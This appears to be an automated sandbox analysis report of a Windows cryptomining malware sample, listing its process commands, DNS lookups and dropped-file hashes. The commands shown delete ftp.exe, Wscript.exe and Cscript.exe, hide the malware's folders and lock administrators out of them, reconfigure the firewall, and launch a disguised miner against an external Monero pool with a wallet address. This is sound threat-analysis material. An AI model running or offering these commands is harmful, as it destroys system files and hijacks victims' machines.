C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\0241FE~1.EXE > nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\ftp.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\system32\ftp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\ftp.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\SysWOW64\ftp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Wscript.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\system32\Wscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Wscript.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\SysWOW64\Wscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Cscript.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\system32\Cscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Cscript.exe
C:\Windows\system32\takeown.exe
takeown /f c:\windows\SysWOW64\Cscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\ftp.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\system32\ftp.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Wscript.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\system32\Wscript.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Cscript.exe /grant administrators:F
C:\Windows\system32\icacls.exe
icacls c:\windows\system32\Cscript.exe /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\ftp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\ftp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Wscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Wscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Cscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Cscript.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\ProgramData\gambecxd"
C:\Windows\system32\attrib.exe
attrib +r +h +s "C:\ProgramData\gambecxd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Cacls "C:\ProgramData\gambecxd" /t /e /c /d administrator
C:\Windows\system32\cacls.exe
Cacls "C:\ProgramData\gambecxd" /t /e /c /d administrator
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\wk.ini"
C:\Windows\system32\attrib.exe
attrib +r +h +s "C:\Program Files\common files\system\wk.ini"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator
C:\Windows\system32\cacls.exe
Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator
C:\ProgramData\gambecxd\svchost.exe
"C:\ProgramData\gambecxd\svchost.exe" -V -o xmr.crypto-pool.fr:443 -u 46SFbeVmsAAR8cFBJ3jjrqbvDheyLShJSfoiPDnoW2W2cimgZJaXCE7aKxgZ4AsUATe1ap4jHEGJ2E9jrYVf1Xb1CSAQDyU -p x -k -t 6
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Users\Public\Documents\gambecxd"
C:\Windows\system32\attrib.exe
attrib +r +h +s "C:\Users\Public\Documents\gambecxd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Cacls "C:\Users\Public\Documents\gambecxd" /t /e /c /d administrator
C:\Windows\system32\cacls.exe
Cacls "C:\Users\Public\Documents\gambecxd" /t /e /c /d administrator
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\jk.ini"
C:\Windows\system32\attrib.exe
attrib +r +h +s "C:\Program Files\common files\system\jk.ini"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator
C:\Windows\system32\cacls.exe
Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator
C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe
C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net start MpsSvc&cmd.exe /c sc config MpsSvc start= auto&cmd.exe /c netsh advfirewall set allprofiles state on&netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound&netsh advfirewall firewall delete rule name=all protocol=tcp localport=137&netsh advfirewall firewall delete rule name=all protocol=tcp localport=138&netsh advfirewall firewall delete rule name=all protocol=tcp localport=139&netsh advfirewall firewall delete rule name=all protocol=tcp localport=445&netsh advfirewall firewall delete rule name=all protocol=udp localport=137&netsh advfirewall firewall delete rule name=all protocol=udp localport=138&netsh advfirewall firewall delete rule name=all protocol=udp localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80&netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c wmic&exit&exit
C:\Windows\SysWOW64\net.exe
net start MpsSvc
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start MpsSvc
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c sc config MpsSvc start= auto
C:\Windows\SysWOW64\sc.exe
sc config MpsSvc start= auto
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=tcp localport=137
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=tcp localport=138
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=tcp localport=139
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=tcp localport=445
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=udp localport=137
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=udp localport=138
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=all protocol=udp localport=139
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443
C:\Windows\SysWOW64\cmd.exe
cmd /c wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value >"C:\Program Files\ls.txt"&exit
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | xmr.djqwehuhfuiwe.xyz | udp |
| US | 8.8.8.8:53 | udp |
Files
C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe
| MD5 | 99d91a5ca408888ad0139ba017c263b0 |
| SHA1 | ee00c4cbb144833ea37557e09dab4d036cf491e3 |
| SHA256 | 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0 |
| SHA512 | 8910a22fe0a3a660e22fb8c8220abe6df6356eea3c342614dddb658bef7bc5c200fe605abdbde0ba50a61fa0e5fef9aae9f2bd083dff0bcfd4a204ed043bc164 |
C:\ProgramData\gambecxd\svchost.exe
| MD5 | d5f810d2810eb4412a5920a677d1bef1 |
| SHA1 | 5d518c9c5b1097708b80ff572501e195b381c30c |
| SHA256 | 33ca0835da8d32f6e187f8a6376720fdf5e417530df7039d01841787cf513d51 |
| SHA512 | b308b9b8ba9d801fe0d0906401263621c7a84113277202feaad50d1e832e3af80131c8794e26ad61ee4c6e62e8404b343493c2186076c9ef6d584fb8b8f09663 |
C:\Program Files\common files\system\wk.ini
| MD5 | 247dc790598a3bdce090350e7af3401c |
| SHA1 | 47798e3ff0b87d752aa3eabe974f8f1f295157cf |
| SHA256 | 3419ab77444269580f555533446263f2674a66a776d5171edd338f41c62bc28c |
| SHA512 | 4b1156c30fbdc6eb8fa067ffd9770607f333e4c18060d6557e196caa36c0c7f108e9051e00d29760b1c06033ab49b0791daad2c521a6c8bfd5f62eacb020081b |
memory/4048-9-0x0000000000400000-0x0000000000498000-memory.dmp
C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe
| MD5 | 6a45590b819f385305ef39c912c134e8 |
| SHA1 | 7916b19ad989ecd1eff12a7de52668f674335f2f |
| SHA256 | e3258f7c8e2be3a5eeaa697b80fc1b3cc64b84a933e551c802c7479b86768db4 |
| SHA512 | 1849029c7e433f5681848f0c8945d565873b2ec7164f9db71abbd3f5b59e3ad83b03f0be62666d2fc77b409565207500a2d29b30ce0a43aa8a67e7e999dd3dad |
C:\Program Files\common files\system\jk.ini
| MD5 | 82badd2e99953adcf4a57f34e8a174a0 |
| SHA1 | 270d320eb655aef221e0cffd81aa51c94cad7771 |
| SHA256 | aca054455f96f96fc90b275b6a54f549267ed59fd56e3e6e5b5ef685e65ee6bc |
| SHA512 | 30595ae24dff1ad39c701bb7e6b53cd719ff4d4ac710b922cb43564636de4d4c400c07fb7e8a10eb4aaca0d47622b044651f46e1421897f20a4736aafed6a665 |
memory/2372-14-0x0000000000400000-0x00000000004D3000-memory.dmp
memory/4048-16-0x0000000000400000-0x0000000000498000-memory.dmp
memory/2372-19-0x0000000000400000-0x00000000004D3000-memory.dmp
C:\Program Files\ls.txt
| MD5 | 0412a1820b20f446e5fa3fc29e650514 |
| SHA1 | 4dca3fc6f12dd9685d76752db2d5f20fbfa3813f |
| SHA256 | 9ec6fd2f1a39cb14281281fce280a6a05960e2d9339748cb2a3603b61ddaa377 |
| SHA512 | 0509593450677fea2aad4d9587315fbd85872a650961948b21c50e785208c30741a936650892429b77a3291cad5e784017696fb920bf30ff0c3ab8e2d9213e3e |
memory/2372-31-0x0000000000400000-0x00000000004D3000-memory.dmp
memory/2372-37-0x0000000000400000-0x00000000004D3000-memory.dmp